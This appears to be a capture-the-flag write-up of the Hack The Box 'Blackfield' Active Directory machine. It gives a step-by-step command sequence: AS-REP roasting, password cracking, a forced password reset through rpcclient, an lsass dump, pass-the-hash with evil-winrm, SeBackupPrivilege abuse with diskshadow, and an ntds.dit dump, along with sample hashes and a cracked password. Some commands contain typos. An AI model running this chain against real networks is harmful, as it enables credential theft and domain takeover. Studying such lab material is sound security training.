Blackfield has been released on 6th of june in 2020, Blackfield is rated as Hard.
From nmap we can assume that we are dealing with a AD machine, after some enumeration we can connect to SMB anonymously, when we connect to profiles$ we see a lot usernames but a few stands out since they don’t start with capital letters. after some more enumeration we found out that we could try kerbroasting attack. after getting user credentials we needed some logical thinking, what can we do with this user? turns out we can change a password. after that we get access to another share where are some sensentive files are located, after downloading them we were able te get a hash from svc_backup. Now we were able to get the user flag. Now it’s time for privesc svc_backup has SeBackupPrivilege enabled. After some researching we can exploit this to get Administrator privileges.
nmap -sV -sC –top-ports=6000 10.10.10.192
This shows it’s an Active Directory machine.
SMB Shares Enumeration
Because SMB in enabled I wanted to check for SMB shares.
smbclient -L 10.10.10.192
Only 1 share is anonymous accessible; profiles$
But by examining the files there was nothing useful in these files.
Also, anonymous login with RPC failed.
After some enumeration of the services which are running I determined that we couldn’t use any of this service for further enumeration. Because this is an Active Directory machine I looked for common Active Directory exploitation vectors.
We know SMB is enabled, so we can check with common usernames, if one of those usernames pre-auth is enabled for one of the users so we can intercept the hash and crack it.
Contents of usernames.txt
python GetNPUsers.py blackfield/dc-01 -usersfile usernames.txt -format john -outputfile intercepted_hash
Cracking the intercepted hash
john –wordlist=/usr/share/wordlists/rockyou.txt intercepted_hash
Cracked password: #00^BlackKnight
The credentials are:
I couldn’t access any SMB share with these credentials but I was able to login with rpcclient.
rpcclient -U support 10.10.10.192
First, I enumerated for more users.
In rpcclient, you have an option called; setuserinfo2. With this option we can update a user’s password.
The only user where I could do this successfully was by: audit2020
setuserinfo2 audit2020 23 IceL0rd
Now that we have updated the audit2020 password, we can try if we can have access to an SMB share.
Access SMB share with updated password
Connecting to the forensic share.
smbclient -U ‘blackfield\audit2020’ \\10.10.10.192\forensic
After some enumeration of the SMB shares, I found an interesting file which can contain a hash.
Now download lsass.zip
smbget smb://10.10.10.192//forensic/memory_analysis/lsass.zip -U audit2020
I used mimidump to dump the hashes
pypykatz lsa minidump lsass.DMP
After this I am going to read out the dump file
Pass the hash svc_backup
Because port 5985 is open we can use evil-winrm to login with the hash.
evil-winrm -i blackfield -u svc_backup -H ‘9658d1d1dcd9250115e2205d9f48400d’
By enumerating the token, we can see that SeBackupPrivilege token is enabled.
Note: This Github page is owned by giuliano108. Secwalk won’t/can’t be responsible for any damage or the content.
Exploiting the SeBackupPrivilege token
First, we need to download the 2 dll, (see resource) and put on the system.
Now we need to import those 2 DLL’s and enable the token.
But we can’t copy the root flag, and read it.
Changing File Permissions NTDS
What we can do is changing file permission of the file ntds.dit (which contain administrator hash).
$acl = Get-Acl $folder
$rule = new-object System.Security.AccessControl.FileSystemAccessRUle $user, “FullControl”, “ContainerInherit,ObjectInherit”, “None”, “Allow”
Set-Acl -Path $folder -AclObject $acl
In order to create a shadow, copy we run diskshadow with the following lines:
set metadata C:\temp\backup.cab
set context clientaccessibles
set context persistents
add volume c: alias mydrives
expose %mydrive% z:s
Uploaded it to target system.
Diskshadow /s scipt.txt
If we look now in our directories we see 2 files that we need to download in order to dump the hash.
Now we have the 2 files we needed on the Kali system.
Now we can sue secretsdump.py in order to dump the hash.
python secretsdump.py -ntds ntds.dit -system SYSTEM.bak LOCAL -outputfile admin_hash
head -n 5 admin_hash.ntds
Pass the hash Administrator
evil-winrm -i 10.10.10.192 -u administrator -H 184fb5e5178480be64824d4cd53b99ee
Made by: IceL0rd
Disclaimer: Please use our posts for educational purposes only. Wrong usage could make you end up in jail.